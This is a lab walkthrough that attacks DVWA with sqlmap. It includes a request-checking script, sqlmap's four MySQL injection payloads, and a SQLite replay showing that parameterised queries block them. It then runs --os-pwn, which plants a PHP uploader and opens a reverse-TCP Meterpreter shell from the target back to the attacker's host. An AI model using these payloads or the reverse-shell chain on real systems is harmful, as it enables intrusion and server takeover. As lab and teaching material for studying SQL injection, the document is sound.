Set up a PHP+MySQL target running DVWA and set the DVWA security level to low (the easiest level to test against).
Open the SQL Injection page, enter 1 in the form and submit it, capture the request with Burp, save the raw request (including its Cookie header) as cookies.txt, and copy the file to the Kali machine.
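Before handing the file to sqlmap it is worth checking that the saved request really carries what the test needs: the id parameter in the query string, a Host header, and a Cookie header with a PHPSESSID and security=low. Without the session cookie DVWA answers every request with a redirect to login.php, and sqlmap will then report the parameter as not injectable. The script below is an added example, not part of this write-up's original procedure and not sqlmap's code; it parses a request file in the format Burp saves and flags those problems. The embedded request is constructed (the session id is made up), while the path and cookie names are the ones DVWA really uses.

```python
"""Sanity-check a raw HTTP request saved from Burp before running sqlmap -r.

Added example for this write-up, not sqlmap's own code.  The request below
is constructed (the session id is invented); the DVWA path and cookie names
are DVWA's real ones.
"""
from urllib.parse import parse_qs, urlsplit

# Constructed sample of what Burp saves for the DVWA SQL Injection page
# after submitting id=1 at security level low.
SAMPLE_REQUEST = """GET /dvwa/vulnerabilities/sqli/?id=1&Submit=Submit HTTP/1.1
Host: 192.168.1.8
User-Agent: Mozilla/5.0
Cookie: security=low; PHPSESSID=constructed0123456789abcdef
Connection: close

"""


def parse_raw_request(raw):
    """Split a raw HTTP/1.x request into method, target, headers and body."""
    head, _, body = raw.replace("\r\n", "\n").partition("\n\n")
    lines = head.split("\n")
    method, target, version = lines[0].split(" ", 2)
    headers = {}
    for line in lines[1:]:
        if not line.strip():
            continue
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return {"method": method, "target": target, "version": version,
            "headers": headers, "body": body}


def parse_cookie_header(value):
    """'a=1; b=2' -> {'a': '1', 'b': '2'}; tolerates a cookie without '='."""
    cookies = {}
    for part in value.split(";"):
        part = part.strip()
        if not part:
            continue
        name, _, val = part.partition("=")
        cookies[name.strip()] = val.strip()
    return cookies


def check_sqlmap_request(raw):
    """Return the parameters sqlmap will test plus a list of problems that
    would make DVWA answer with a login redirect instead of the vulnerable
    page (or leave sqlmap with nothing to inject into)."""
    req = parse_raw_request(raw)
    params = {k: v[0] for k, v in parse_qs(urlsplit(req["target"]).query).items()}
    if req["method"] == "POST":
        params.update({k: v[0] for k, v in parse_qs(req["body"]).items()})
    cookies = parse_cookie_header(req["headers"].get("cookie", ""))
    problems = []
    if "host" not in req["headers"]:
        problems.append("no Host header: sqlmap cannot build the target URL")
    if "PHPSESSID" not in cookies:
        problems.append("no PHPSESSID: DVWA will redirect every request to login.php")
    if cookies.get("security") != "low":
        problems.append("security cookie is %r, not 'low'" % cookies.get("security"))
    if not params:
        problems.append("no parameters: nothing for sqlmap to inject into")
    return {"params": params, "cookies": cookies, "problems": problems}


if __name__ == "__main__":
    result = check_sqlmap_request(SAMPLE_REQUEST)
    print("parameters to test:", result["params"])
    print("problems:", result["problems"] or "none")
```

Run it against the real cookies.txt by reading the file into check_sqlmap_request(); an empty problems list means the request is ready for sqlmap -r.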
root@kali:~# sqlmap -r "/root/cookies.txt"
Output:
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
    Type: boolean-based blind
    Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment)
    Payload: id=-1890' OR 7466=7466#&Submit=Submit

    Type: error-based
    Title: MySQL OR error-based - WHERE or HAVING clause
    Payload: id=-6878' OR 1 GROUP BY CONCAT(0x7162626271,(SELECT (CASE WHEN (5403=5403) THEN 1 ELSE 0 END)),0x716b766271,FLOOR(RAND(0)*2)) HAVING MIN(0)#&Submit=Submit

    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (SELECT - comment)
    Payload: id=' AND (SELECT * FROM (SELECT(SLEEP(5)))Dgpu)#&Submit=Submit

    Type: UNION query
    Title: MySQL UNION query (NULL) - 2 columns
    Payload: id=' UNION ALL SELECT NULL,CONCAT(0x7162626271,0x4c4266596d5953594265,0x716b766271)#&Submit=Submit
---
[13:45:05] [INFO] the back-end DBMS is MySQL
web server operating system: Windows
web application technology: PHP 5.3.29, Apache 2.4.10
back-end DBMS: MySQL >= 5.0.12
[13:45:05] [INFO] fetched data logged to text files under '/root/.sqlmap/output/192.168.1.8'
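To see why sqlmap found all four techniques, it helps to replay two of its payloads against the query DVWA builds at the low level, which is SELECT first_name, last_name FROM users WHERE user_id = '$id' with $id concatenated unescaped. The script below is an added example, not DVWA's or sqlmap's code. It uses SQLite in place of MySQL (an assumption made so it runs offline), so the MySQL comment marker # becomes -- and string concatenation uses || instead of CONCAT(); the error-based (FLOOR(RAND(0)*2) with GROUP BY) and time-based (SLEEP) payloads are MySQL-specific and are not replayed. The same inputs are then run through a parameterised query to show that the payloads become plain, non-matching values. The users table is constructed, modelled on DVWA's default rows.

```python
"""Replay sqlmap's boolean-based and UNION payloads against a DVWA-style
query, vulnerable and parameterised.  Added example for this write-up, not
DVWA's or sqlmap's code.  SQLite stands in for MySQL (assumption): '#' is
replaced by '-- ' and CONCAT() by '||'.
"""
import sqlite3

# Constructed stand-in for DVWA's users table (modelled on its default rows).
SEED_USERS = [
    (1, "admin", "admin", "admin"),
    (2, "gordonb", "Gordon", "Brown"),
    (3, "1337", "Hack", "Me"),
    (4, "pablo", "Pablo", "Picasso"),
    (5, "smithy", "Bob", "Smith"),
]


def make_db():
    """In-memory SQLite database playing the role of DVWA's MySQL schema."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE users (user_id INTEGER, user TEXT, first_name TEXT, last_name TEXT)"
    )
    conn.executemany("INSERT INTO users VALUES (?, ?, ?, ?)", SEED_USERS)
    return conn


def lookup_vulnerable(conn, user_id):
    """DVWA low: the id is pasted straight into the SQL string."""
    query = "SELECT first_name, last_name FROM users WHERE user_id = '%s'" % user_id
    return conn.execute(query).fetchall()


def lookup_fixed(conn, user_id):
    """Parameterised version: user_id is bound as data, never parsed as SQL."""
    query = "SELECT first_name, last_name FROM users WHERE user_id = ?"
    return conn.execute(query, (user_id,)).fetchall()


# sqlmap's boolean-based payload from the report ('#' replaced by '-- ').
# -1890 matches no row; OR 7466=7466 is always true, so every row comes back.
BOOLEAN_TRUE = "-1890' OR 7466=7466-- "

# sqlmap's UNION payload, same two-column shape.  CONCAT(0x7162626271, ...,
# 0x716b766271) wraps the extracted value in the markers 'qbbq' and 'qkvbq'
# so sqlmap can locate it in the HTML; here sqlite_version() stands in for
# the random probe string 0x4c4266596d5953594265 that sqlmap used.
UNION_MARKER = "' UNION ALL SELECT NULL, 'qbbq' || sqlite_version() || 'qkvbq'-- "


def demo():
    """Run the legitimate lookup and both payloads against both query styles."""
    conn = make_db()
    return {
        "normal": lookup_vulnerable(conn, "1"),
        "boolean": lookup_vulnerable(conn, BOOLEAN_TRUE),
        "union": lookup_vulnerable(conn, UNION_MARKER),
        "fixed_boolean": lookup_fixed(conn, BOOLEAN_TRUE),
        "fixed_union": lookup_fixed(conn, UNION_MARKER),
    }


if __name__ == "__main__":
    for name, rows in demo().items():
        print("%-14s %s" % (name, rows))
```

The boolean payload returns the whole table from the vulnerable lookup, the UNION payload returns a row whose second column is the marker-wrapped probe value, and both return nothing from the parameterised lookup because the whole string is compared as a value against user_id.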
Once the injection point is confirmed, run sqlmap again with --os-pwn, pointing --msf-path at the local Metasploit installation. This only works if the MySQL account DVWA connects with has the FILE privilege (sqlmap writes its stager into the web root with SELECT ... INTO OUTFILE), secure_file_priv does not block writes there, and the web root is known and writable by the MySQL process; on a default DVWA setup, which connects as MySQL root, it is, which is why sqlmap asks for the web root path below.
root@kali:~# sqlmap -r "/root/cookies.txt" --os-pwn --msf-path=/opt/metasploit
(output trimmed)
how do you want to establish the tunnel?
[1] TCP: Metasploit Framework (default)
[2] ICMP: icmpsh - ICMP tunneling
> 1    (TCP tunnel with a Metasploit shell)
which web application language does the web server support?
[1] ASP (default)
[2] ASPX
[3] JSP
[4] PHP
> 4    (PHP stager)
what do you want to use for writable directory?
[1] common location(s) ('C:/xampp/htdocs/, C:/inetpub/wwwroot/') (default)
[2] custom location(s)
[3] custom directory list file
[4] brute force search
> 2    (custom path)
please provide a comma separate list of absolute directory paths: d:/www/dvwa/    (the absolute path of the DVWA web root on the target)
which connection type do you want to use?
[1] Reverse TCP: Connect back from the database host to this machine (default)
[2] Reverse TCP: Try to connect back from the database host to this machine, on all ports between the specified and 65535
[3] Reverse HTTP: Connect back from the database host to this machine tunnelling traffic over HTTP
[4] Reverse HTTPS: Connect back from the database host to this machine tunnelling traffic over HTTPS
[5] Bind TCP: Listen on the database host for a connection
> 1    (reverse TCP connection)
what is the local address? [Enter for '192.168.1.104' (detected)]
which local port number do you want to use? [16308]
which payload do you want to use?
[1] Meterpreter (default)
[2] Shell
[3] VNC
> 1    (Meterpreter)
(output trimmed)
PAYLOAD => windows/meterpreter/reverse_tcp
EXITFUNC => process
LPORT => 16308
LHOST => 192.168.1.104
[*] Started reverse handler on 192.168.1.104:16308
[*] Starting the payload handler...
[13:46:43] [INFO] running Metasploit Framework shellcode remotely via shellcodeexec, please wait..
[*] Sending stage (957487 bytes) to 192.168.1.8
[*] Meterpreter session 1 opened (192.168.1.104:16308 -> 192.168.1.8:37639) at 2016-01-17 13:46:45 +0800
meterpreter > Loading extension espia...success.
meterpreter > Loading extension incognito...success.
meterpreter > Computer        : pgos
OS              : Windows 7 (Build 7601, Service Pack 1).
Architecture    : x64 (Current Process is WOW64)
System Language : zh_CN
Domain          : WORKGROUP
Logged On Users : 1
Meterpreter     : x86/win32
meterpreter > Server username: pgos\administrator
meterpreter >
Note that, to get this far, sqlmap drops a randomly named PHP file uploader into the DVWA web root given above (d:/www/dvwa/) and uses it to upload the shellcodeexec binary that runs the Meterpreter stager. These files are not removed when the session ends (sqlmap's --cleanup option only removes the DBMS-side UDFs and tables), so delete them once the test is finished: anyone who finds them has a ready-made file-upload and code-execution primitive on the server.